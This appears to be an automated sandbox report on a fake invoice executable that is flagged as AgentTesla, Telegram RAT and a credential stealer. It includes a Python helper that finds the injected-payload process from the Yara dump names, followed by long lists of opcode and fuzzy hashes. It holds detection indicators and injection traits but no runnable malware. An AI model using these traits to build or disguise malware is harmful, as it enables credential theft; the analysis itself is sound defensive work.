Path: C:\Users\user\Desktop\Invoice_PDF.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Invoice_PDF.exe
Imagebase: 0xed0000
File size: 584704 bytes
MD5 hash: 1DCC43F272F66D8E5AFE11E7276DD122
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Reputation:low
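The two process entries share the same image path, but their Yara hits differ in where they land. In the first instance the matches are in regions whose protection field reads 00000004 (PAGE_READWRITE, ordinary heap), while in the second every AgentTesla match sits at 0000000000402000 with protection 00000040 (PAGE_EXECUTE_READWRITE). A normally mapped image section is PAGE_EXECUTE_READ, so an RWX region at the classic .text address of a 0x400000-based image is the trace one expects when a payload has been written into a second copy of the process rather than loaded from its file on disk. The following added example, not code from the report or from Joe Sandbox, parses the dump names in the Yara lines above into per-process summaries and flags the process that fits that pattern. It assumes the dotted name's first field is the report's process index (the first process is 00000000, the second 00000003), the fourth the region base and the fifth the page protection; the remaining fields are treated as opaque:

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed input: Yara match lines copied from the two process entries in
# this report, in the report's own bullet format (subset of the full list).
YARA_LINES = """
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
"""

PAGE_EXECUTE_READWRITE = 0x40          # Win32 memory protection constant
LINE_RE = re.compile(r"Rule: (?P<rule>[^,]+), .*?Source: (?P<src>[0-9A-Fa-f.]+\.sdmp)")


def parse_source(src: str) -> Dict[str, int]:
    """Split a dump name such as 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp.
    Assumed layout (from the report's own numbering): [0] process index, [3] region base in hex,
    [4] page protection in hex. Fields [1], [2] and [5] are not interpreted here."""
    parts = src.split(".")
    return {"process": int(parts[0]), "base": int(parts[3], 16), "protect": int(parts[4], 16)}


def summarize(text: str) -> Dict[int, dict]:
    """Per process: rule names hit, region bases hit, and the subset of those that are RWX."""
    procs = defaultdict(lambda: {"rules": set(), "regions": set(), "rwx_regions": set()})
    for m in LINE_RE.finditer(text):
        s = parse_source(m["src"])
        p = procs[s["process"]]
        p["rules"].add(m["rule"])
        p["regions"].add(s["base"])
        if s["protect"] & 0xFF == PAGE_EXECUTE_READWRITE:   # low byte is the access class
            p["rwx_regions"].add(s["base"])
    return dict(procs)


def injected_payload_candidates(summary: Dict[int, dict]) -> List[int]:
    """Processes where a family rule (here AgentTesla) fires inside an RWX region:
    a payload written into the process rather than mapped from its image on disk."""
    return sorted(pid for pid, p in summary.items()
                  if p["rwx_regions"] and any(r.startswith("JoeSecurity_AgentTesla") for r in p["rules"]))


if __name__ == "__main__":
    summary = summarize(YARA_LINES)
    for pid, p in sorted(summary.items()):
        print(pid, sorted(p["rules"]), [hex(b) for b in sorted(p["regions"])],
              [hex(b) for b in sorted(p["rwx_regions"])])
    print("payload written into process index:", injected_payload_candidates(summary))
```

The comparison masks the protection to its low byte because Windows combines the access class (0x01 to 0x80) with modifier bits such as PAGE_GUARD (0x100), so a plain equality test would miss a guarded RWX page. On the lines above this yields index 3 as the only candidate, which is the process whose later dump also carries the TelegramRAT and CredentialStealer hits.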

                                                                                                Disassembly

                                                                                                Code Analysis


                                                                                                  Executed Functions

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$&$'$)$*
                                                                                                  • API String ID: 0-578644490
                                                                                                  • Opcode ID: b55514b0b3efe71712b6d5533745bb60bb041dddc68189fee77a7463ec0e5fac
                                                                                                  • Instruction ID: 81cf1fb38ede894d61cab7a1ebab2e50b5681992591d098d37595abc90524649
                                                                                                  • Opcode Fuzzy Hash: b55514b0b3efe71712b6d5533745bb60bb041dddc68189fee77a7463ec0e5fac
                                                                                                  • Instruction Fuzzy Hash: 8ED1F0B0D51229DFDB64CF65D948BE9BBB1BB49304F1091EAD409A7290DBB45EC4CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $!$&$($.
                                                                                                  • API String ID: 0-2525140565
                                                                                                  • Opcode ID: c5bf206f4efb33a9f898bfe38fc0c0434fa4eeabe1bdbbe02cfaf41c8e454585
                                                                                                  • Instruction ID: a56c2d34b71c7a1874e605c86fa4eb0c52d411d0e1c481447198943f90085af0
                                                                                                  • Opcode Fuzzy Hash: c5bf206f4efb33a9f898bfe38fc0c0434fa4eeabe1bdbbe02cfaf41c8e454585
                                                                                                  • Instruction Fuzzy Hash: A781BCB4D61229DFDB24DF64D9887E9BBB0BB09309F0091E9D409A7291DB749EC8CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$'$)
                                                                                                  • API String ID: 0-699087999
                                                                                                  • Opcode ID: 390a334e7afa65e7827dac944f631a503efca6b3b806589d8e13af2d3137e3f5
                                                                                                  • Instruction ID: db948c8c7881c49dea8187b72adffd00dc02b54cedc97572270bda57956cb23f
                                                                                                  • Opcode Fuzzy Hash: 390a334e7afa65e7827dac944f631a503efca6b3b806589d8e13af2d3137e3f5
                                                                                                  • Instruction Fuzzy Hash: DE71D374990229DFDB64CF64D988BE9BBB1FB09304F1090EAE409A7290DB749EC4CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !$&$.
                                                                                                  • API String ID: 0-70066171
                                                                                                  • Opcode ID: 961d64711cb7352568b2dbbe8b50487334ff9ef1a7a9e01d34b957bc6100d1a8
                                                                                                  • Instruction ID: b5667cbfa042c6a40a9eb863f1f5b93b47e14115ba1565c23e58dac95be80270
                                                                                                  • Opcode Fuzzy Hash: 961d64711cb7352568b2dbbe8b50487334ff9ef1a7a9e01d34b957bc6100d1a8
                                                                                                  • Instruction Fuzzy Hash: B951BF74DA5229DFDB24DF64E9487E9BBB0BB09305F0091EAD409A7291D7B45EC8CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !$&$.
                                                                                                  • API String ID: 0-70066171
                                                                                                  • Opcode ID: aa180325a811ef201abc4cc3e837db72d69e1a8386e6419966b17510eb6dbd00
                                                                                                  • Instruction ID: 909d4aa22a71f800ac2b1c62d0c4909193b296ab3bcd6790042a328e180d2597
                                                                                                  • Opcode Fuzzy Hash: aa180325a811ef201abc4cc3e837db72d69e1a8386e6419966b17510eb6dbd00
                                                                                                  • Instruction Fuzzy Hash: 3851BB74DA5229DFCB64DF64D9487EDBBB0BB09309F0091E9D40AA7280DB749AC8CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$($+
                                                                                                  • API String ID: 0-3438877294
                                                                                                  • Opcode ID: 01de83d0f300c70268691d6b6c5bd84b50792a24ff0fd4c6d099aa2a7a8aafda
                                                                                                  • Instruction ID: 67dc898e5d8408b1bf9fc8a5103733f32ba35b5441134c0d82caaf12073e71f3
                                                                                                  • Opcode Fuzzy Hash: 01de83d0f300c70268691d6b6c5bd84b50792a24ff0fd4c6d099aa2a7a8aafda
                                                                                                  • Instruction Fuzzy Hash: 0A41D074995229DFCB60CFA4D984BE9BBB4BB09314F0090EAD40DA7241D7759EC8CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$&
                                                                                                  • API String ID: 0-3823129461
                                                                                                  • Opcode ID: fd872f7bceda3dd50def10c7afeee55d940772222e79c6972303cb5bc2252c4f
                                                                                                  • Instruction ID: 9b662d1c0f55267c116237c35c2e73c94e8b691c95e57e849f8de778471a93b0
                                                                                                  • Opcode Fuzzy Hash: fd872f7bceda3dd50def10c7afeee55d940772222e79c6972303cb5bc2252c4f
                                                                                                  • Instruction Fuzzy Hash: 7041AC70D55229CFDB60CF68E888BEEBBB1AB49305F1090E9D419A7241DB309EC8CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$&
                                                                                                  • API String ID: 0-3793893698
                                                                                                  • Opcode ID: 5b5636216e5bc23ef6790a84983979224151840f636cd256b8e4ddd761e254a5
                                                                                                  • Instruction ID: 66ab6054ecaa278011e21de7c678d8bcc779eb14e0a05cd2b917c7d41df9a607
                                                                                                  • Opcode Fuzzy Hash: 5b5636216e5bc23ef6790a84983979224151840f636cd256b8e4ddd761e254a5
                                                                                                  • Instruction Fuzzy Hash: B641BC70D612299FCB64DF64D948BE9BBB1BB09309F0091E9D40DA7250DB709EC8CF51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$(
                                                                                                  • API String ID: 0-131901980
                                                                                                  • Opcode ID: 17c6d0c63f3143a3ffa41634d3c265407eb5a0ac21610c66da921e63f3c53ef9
                                                                                                  • Instruction ID: dcac55d9900a68c31f61a54de5531d8df97da9b42195cd6b2eb589916fc96514
                                                                                                  • Opcode Fuzzy Hash: 17c6d0c63f3143a3ffa41634d3c265407eb5a0ac21610c66da921e63f3c53ef9
                                                                                                  • Instruction Fuzzy Hash: D131CE70D912299FCB24DF64E9887EDBBB1AB1A309F0094E9D409A7250CB749EC4CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$(
                                                                                                  • API String ID: 0-131901980
                                                                                                  • Opcode ID: bca48df33fb5b58d390fb0bb0a0ccad6b6de388ab7cdb9881314765fd0cbae91
                                                                                                  • Instruction ID: 72647faff91981a1e2b73965378f385e583ed555ce206eaff1c7182901d4252c
                                                                                                  • Opcode Fuzzy Hash: bca48df33fb5b58d390fb0bb0a0ccad6b6de388ab7cdb9881314765fd0cbae91
                                                                                                  • Instruction Fuzzy Hash: 2831BDB0DA1229DFCB24DF64E9887E9BBB1BB59309F0095EAD409A7250D7745EC4CF00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $&
                                                                                                  • API String ID: 0-3840539561
                                                                                                  • Opcode ID: d52ef11042d9bf541a6892bcbc5b5fdd4d3d39c63563fa543a660ff15683bb9c
                                                                                                  • Instruction ID: ac12ff5169588131a3f100ea8dbee52c4130c0b8cc5458c9db16a31b2741b5df
                                                                                                  • Opcode Fuzzy Hash: d52ef11042d9bf541a6892bcbc5b5fdd4d3d39c63563fa543a660ff15683bb9c
                                                                                                  • Instruction Fuzzy Hash: 2531E47499522ADFDB20CF64E948BE9BBB0FB09305F0090E6D409A7290C7749EC8CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$-
                                                                                                  • API String ID: 0-2008440467
                                                                                                  • Opcode ID: e9667a11b5d4459314759b380daf8161beb70d8a79c94469f96c6cb1314e6a70
                                                                                                  • Instruction ID: 452a71f048686f4ca0c4151433b7ded4321b8a073b53f0d9830a6b0bb9c7987a
                                                                                                  • Opcode Fuzzy Hash: e9667a11b5d4459314759b380daf8161beb70d8a79c94469f96c6cb1314e6a70
                                                                                                  • Instruction Fuzzy Hash: F321CF7595522ADFCB60DFA4D988BE9BBB1FB09318F1090E9D409A7241C775AEC4CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$,
                                                                                                  • API String ID: 0-11628037
                                                                                                  • Opcode ID: a6e83445db51f96767923f891fa44944f9c7b2d092a017db200c2f9ac34b023a
                                                                                                  • Instruction ID: f0e716477855360df848313e2c67b56ad308cd95e6f4ec9aea4e160498eaa861
                                                                                                  • Opcode Fuzzy Hash: a6e83445db51f96767923f891fa44944f9c7b2d092a017db200c2f9ac34b023a
                                                                                                  • Instruction Fuzzy Hash: 5921A07499522ADBDB60CF64E848BE9BBB1FB09315F10A0EAD459A7240CB745AC4CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$&
                                                                                                  • API String ID: 0-3882692551
                                                                                                  • Opcode ID: 2f8b999b5f8b03f5db322ac84505f81dd264657bc6858d6834345a1fdd81e8a9
                                                                                                  • Instruction ID: 6f60f8dfe7752a65735b4ff2d83246d7c14d46abc750444ac1b9d489aa9be839
                                                                                                  • Opcode Fuzzy Hash: 2f8b999b5f8b03f5db322ac84505f81dd264657bc6858d6834345a1fdd81e8a9
                                                                                                  • Instruction Fuzzy Hash: 3621C07499522ADFCB60CFA4E848BE9BBB1FB49319F00A1E6D419A7241C7745EC8CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #$&
                                                                                                  • API String ID: 0-3870246384
                                                                                                  • Opcode ID: 6ee684791a1b50eb2519a00aecbf83ef5f38a19e91b109dfd55bddb84f524f5d
                                                                                                  • Instruction ID: db9426b408dc35e6ff05c06bdc353913754287ab6e0d537d9cf9a49835ac6184
                                                                                                  • Opcode Fuzzy Hash: 6ee684791a1b50eb2519a00aecbf83ef5f38a19e91b109dfd55bddb84f524f5d
                                                                                                  • Instruction Fuzzy Hash: 5E11B2749A522ADFCB60CF54E948BE9BBB1BB09319F00A0E5D41DA7251C7749AC8CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$+
                                                                                                  • API String ID: 0-2664823718
                                                                                                  • Opcode ID: 812bd0fb7c99b91e48d8c65a2caee3af72faff1e16f1dc856d0bb20f2db6a878
                                                                                                  • Instruction ID: a610d9ec89056c864a70ca4bf267ad706ec4a4aa753bd7b878ffc42a027809e5
                                                                                                  • Opcode Fuzzy Hash: 812bd0fb7c99b91e48d8c65a2caee3af72faff1e16f1dc856d0bb20f2db6a878
                                                                                                  • Instruction Fuzzy Hash: 4011D0749A522ADFCB60DF54E948BE9BBB1BB09319F00A0E6D41DA7240C7745EC8CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: 9055fd49655d3e427dec4d541a6a36ad5a013129ad5208716292f02cc4883c35
                                                                                                  • Instruction ID: afb649ef0811c23711c72b8fa2c066ecc430362827479445453f5758822b78d2
                                                                                                  • Opcode Fuzzy Hash: 9055fd49655d3e427dec4d541a6a36ad5a013129ad5208716292f02cc4883c35
                                                                                                  • Instruction Fuzzy Hash: 2A31D074D512299FCB24CFA4D944BEDBBB1AB59308F0090E9D01DAB244C7705EC8CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: 52d69c5b1fb9c37efa0c6b9ab16d6577361b9f4e55a11e9648202bf85cfecf2e
                                                                                                  • Instruction ID: cf00f5fef59288bcf41e30cf5e73caacc949fcb813194bfe8cf3bc4f8334c829
                                                                                                  • Opcode Fuzzy Hash: 52d69c5b1fb9c37efa0c6b9ab16d6577361b9f4e55a11e9648202bf85cfecf2e
                                                                                                  • Instruction Fuzzy Hash: E431D174D512299FCB64DFA4E954BEDBBB1AB5A308F1090E9D11DA7244CB705EC8CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: 39631e6a72d7a7b9572a6358154f5effddeb4946a3a5ac20c9e428ad649ed75e
                                                                                                  • Instruction ID: 8b5c090cbc8d56e335e29340c227d538410fe6515b28ca2a701ed1d0f0bc047f
                                                                                                  • Opcode Fuzzy Hash: 39631e6a72d7a7b9572a6358154f5effddeb4946a3a5ac20c9e428ad649ed75e
                                                                                                  • Instruction Fuzzy Hash: E931EE74950229DFCB24DFA0E944BE9BBB1FB49318F1090EAD409A7250CB359EC4CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: 767c7f04a299a93191a22668edce9a8c8826664145cc25d7ccdb7dd088b68c9f
                                                                                                  • Instruction ID: a950d286b38e9a90269d0202a18356212ddd478972b6cfca90cca9df2636b542
                                                                                                  • Opcode Fuzzy Hash: 767c7f04a299a93191a22668edce9a8c8826664145cc25d7ccdb7dd088b68c9f
                                                                                                  • Instruction Fuzzy Hash: 2531D07499422ADFDB60DF64E8887E9BBB0BB09318F0091E9D40DA7240C7745EC4CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: cf29b5e2e571a007d9f241e54bc85b7663dd4a80eec713d59442388db8182728
                                                                                                  • Instruction ID: 61e8e4889f54a427a869ac5013750f6d625ce779614ff1b71635fa294f81b3ed
                                                                                                  • Opcode Fuzzy Hash: cf29b5e2e571a007d9f241e54bc85b7663dd4a80eec713d59442388db8182728
                                                                                                  • Instruction Fuzzy Hash: CD31AE7495122ADFCB60DF64D944BE9BBB1BB09358F0090EAD80DA7241D7749EC4CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: 688893de4cefc66c6d5d6ac1e7a7ccc7f17794d8db7e122f4cd2d9e0b02bca57
                                                                                                  • Instruction ID: 137e8f39e7a64398f694b1d0fa90e7ee79257b7183813ef1237fcaa3482ab59c
                                                                                                  • Opcode Fuzzy Hash: 688893de4cefc66c6d5d6ac1e7a7ccc7f17794d8db7e122f4cd2d9e0b02bca57
                                                                                                  • Instruction Fuzzy Hash: 0921D27099122ADFCB64DF64D948BE9BBB1AB09308F0091E9D419A7250CB745EC4CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: 83327ddc3bb09ed2a7e3c36b9a05608792411d484f111b6ea930adbd2bcdd476
                                                                                                  • Instruction ID: 0bc6c98bf9d45e41628498bc1488e5ab609a33e989e6d70c8f1bf05214e977d8
                                                                                                  • Opcode Fuzzy Hash: 83327ddc3bb09ed2a7e3c36b9a05608792411d484f111b6ea930adbd2bcdd476
                                                                                                  • Instruction Fuzzy Hash: 7C21DF74D9522A9FCB64DFA4E848BE9BBB1EB59318F0090E9D459A7240CB705EC4CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: bc5beb50040dd85f17d83dcd79c0fb993975a3ae8a0799394da7d4ae43ced81b
                                                                                                  • Instruction ID: afbdda5f6c06405a1acf69995d118d494287b9ede9fc72edb92c59e62d73be2d
                                                                                                  • Opcode Fuzzy Hash: bc5beb50040dd85f17d83dcd79c0fb993975a3ae8a0799394da7d4ae43ced81b
                                                                                                  • Instruction Fuzzy Hash: EE21BC74A95229DFDB60CFA4E948BE9BBB1BB49304F10A0EAE509A7240C7745AC4CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: 0056a673878897ff10035657303ed5fdeaed64e2ecfc2705d3e364c24452c337
                                                                                                  • Instruction ID: 61a4329e9ea840b67ccaa1f3270c2a16ddd378d9f04a1850de119b0b7adc5d95
                                                                                                  • Opcode Fuzzy Hash: 0056a673878897ff10035657303ed5fdeaed64e2ecfc2705d3e364c24452c337
                                                                                                  • Instruction Fuzzy Hash: A621E37499422ADFCB60CF64E884BE9BBB1FB09314F1091E9D40DA7241C7749AC4CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
                                                                                                  • Opcode ID: 3e1dc5116bf59ad52ba16774c77e7418801b7a27a124bd6f9c392dfb0993cf8c
                                                                                                  • Instruction ID: 86675a2adff813a0cf23aa039ee2473dd0611cdbd912132fd7156f6af6b6cd62
                                                                                                  • Opcode Fuzzy Hash: 3e1dc5116bf59ad52ba16774c77e7418801b7a27a124bd6f9c392dfb0993cf8c
                                                                                                  • Instruction Fuzzy Hash: 9421A27499522ADFCB60DF60E948BE9BBB1FB49315F10A0E9D409A7240CB745EC8DF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &
                                                                                                  • API String ID: 0-1010288
APIs
• GetCurrentProcess.KERNEL32 ref: 02E2C170
• GetCurrentThread.KERNEL32 ref: 02E2C1AD
• GetCurrentProcess.KERNEL32 ref: 02E2C1EA
• GetCurrentThreadId.KERNEL32 ref: 02E2C243
Memory Dump Source
